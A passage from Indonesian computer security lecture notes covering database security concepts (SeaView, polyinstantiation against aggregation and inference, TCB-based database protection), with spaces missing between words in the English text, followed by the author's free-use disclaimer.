o SRISeaViewdatabasesystem;piecesofdatalabeledassensitive,aggregatesmay
thenbelabeledasnonsensitive

Polyinstantiation,aControlAgainstDisclosure
Thisapproachinvolvesdifferentviewsofadatabaseobjectexistingforuserswithdifferent
securityattributes
Addressestheaggregationproblembyprovidingdifferentsecuritylabelstodifferent
aggregatesseparately
Addressestheinferenceproblembyprovidingameansforhidinginformationthatmaybe
usedtomakeinferences
DatabaseApplicationsonSecureBases
Mostdatabaseapplicationsrelyonunderlyingservicesofanoperatingsystem
Hal:42
KeamananKomputer
ExportingtheseservicesfromaTCBwouldenhancethesecurityofthe
database
o databasekeysimplementedusingsecuritylabelsfromunderlyingTCB
o TCBkeepsauditrecordsofoperationsondatabase
o OSfilesystemprotectionextendedtodatabase
Hal:43
KeamananKomputer

DISCLAIMER

Bismillahirohmanirrohim
Berangkat dari niat menyampaikan ilmu, dapatlah kiranya timbul
suatu harapan agar diktat tulisan rangkum materi re-
organizing paper yang telah dibuat ini dapat bermanfaat bagi semua
yang membutuhkannya.

Siapa pun dipersilahkan untuk mengambilnya, mengutipnya,
memanfaatkannya dengan semaksimal mungkin. Silahkan
memperbanyak, mencetak, meng-copy-nya dengan bebas guna
kelancaran transfer ilmu pengetahuan. Dan apabila dimanfaatkan
untuk sesuatu yang bersifat komersial, ada baiknya dapat
mengabarkan terlebih dahulu, sekedar pemberitahuan, atas
kehormatan yang diberikan tersebut.

Mohammad Iqbal, Skom, MMSi
mohiqbal@softhome.net
Hal:44